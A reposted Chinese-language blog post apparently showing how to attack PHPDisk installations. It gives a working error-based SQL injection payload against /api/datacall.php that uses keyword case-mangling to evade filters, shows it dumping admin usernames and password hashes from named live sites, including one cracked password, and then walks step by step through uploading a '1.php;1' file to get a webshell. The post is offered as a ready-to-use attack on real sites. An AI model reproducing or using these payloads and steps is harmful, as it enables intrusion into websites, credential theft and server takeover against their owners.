- A+
显示不全请点击全屏阅读
把select关键字改成SEleCt
语句如下
/api/datacall.php?type=user&by=and%201=1&limit=1&order=1 and(sEleCt 1 from(sEleCt count(*),concat((sEleCt (sEleCt (sEleCt concat(0×27,0x7e,pd_users.username,0×27,0x7e,pd_users.password,0×27,0x7e) from pd_users where userid=1 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#
漏洞演示
http://demo.xxx.com/55//api/datacall.php?type=user&by=and%201=1&limit=1&order=1%20and(sEleCt%201%20from(sEleCt%20count(*),concat((sEleCt%20(sEleCt%20(sEleCt%20concat(0×27,0x7e,pd_users.username,0×27,0x7e,pd_users.password,0×27,0x7e)%20from%20pd_users%20where%20userid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1#
成功利用爆出密码
MySQL Info: Duplicate entry ”~admin’~e10adc3949ba59abbe56e057f20f883e’~1′ for key ‘group_key’ , 1062
HOW TO GETSHELL?
官方演示后台好像是做了文章的 进不去 我们换个别的站来演示 BAIDUHACK Powered by PHPDisk
http://ymzlk.xxx.com//api/datacall.php?type=user&by=and%201=1&limit=1&order=1%20and(sEleCt%201%20from(sEleCt%20count(*),concat((sEleCt%20(sEleCt%20(sEleCt%20concat(0×27,0x7e,pd_users.username,0×27,0x7e,pd_users.password,0×27,0x7e)%20from%20pd_users%20where%20userid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1#
好 成功爆出账号密码
MySQL Info: Duplicate entry ”~deathdd’~3a82b73fda0dc40ac27a83fcfabcb995′~1′ for key ‘group_key’ , 1062
deathdd death113
在首页直接登陆
登陆成功后点系统管理
在输入一次我们的密码进去系统管理
进入总管理后台后
网站配置-高级选项-可外链的文件名里面添加上php;1
然后在开启外连
回到前台 在我的网盘里面上传一个1.php;1的文件
在系统管理的文件管理里面找到我们刚才上传的那个文件 直接点开 得到SHELL地址
http://ymzlk.xxx.com/filestores/deathdd/1.php;1 密码whoami 这样就拿下SHELL了 是不是很简单呢?
转自:http://www.cnlvke.com/archives/5651.html
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡